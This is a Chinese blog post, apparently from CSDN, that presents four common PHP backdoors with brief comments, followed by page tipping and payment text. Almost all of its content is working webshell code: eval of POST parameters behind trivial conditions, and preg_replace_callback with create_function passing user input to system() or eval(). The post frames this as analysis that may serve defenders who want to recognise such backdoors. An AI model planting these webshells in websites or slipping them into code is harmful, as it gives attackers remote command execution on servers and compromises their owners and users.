常见php后门分析

本文详细介绍了四种常见的PHP安全漏洞利用方式,包括通过常量定义触发的一句话木马,preg_replace_callback函数结合正则表达式实现的远程代码执行(RCE),以及通过特定条件执行用户输入的eval方法。这些漏洞可能导致服务器被植入后门,影响系统安全。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、第一种

<?php
define('test', 1); #定义一个常量 test,并且值为1

$test = $_POST[test];#因为前面定义了常量 test且值为1,而此处用了常量test:“$_POST[test]”,所以post传输数据必须为1,否则与前面定义的常量不一致,导致报错

if(test == 1){
	@eval($test);#一句话木马后门
}

连接方式
在这里插入图片描述

二、第二种

<?php

$searchword = $_POST['searchword'];

preg_replace_callback('/asshole(.+)/i', create_function('$arr', 'return system($arr[1]);'), $searchword);
#/asshole(.+)/i的意思是正则匹配$searchword传递的参数中asshole及其以后的所有字符串且不区分大小写,并且将匹配到的所有字符串传递给参数$arr,而system()函数执行传递过来的$arr,导致RCE,php后门

?>

连接方式:
在这里插入图片描述

PHP preg_replace_callback() 函数介绍参考链接:https://www.runoob.com/php/php-preg_replace_callback.html

三、第三种

<?php
$username = $_POST['username'];
$password = $_POST['password'];

if($username =='administrator'){
	eval($password);
	}
?>

连接方法
在这里插入图片描述

四、第四种

<?php
preg_replace_callback('/.+/i', create_function('$arr', 'return eval($arr[0]);'), $_REQUEST['pass']);
#与第二种一样
?>

连接方式
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W小哥1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值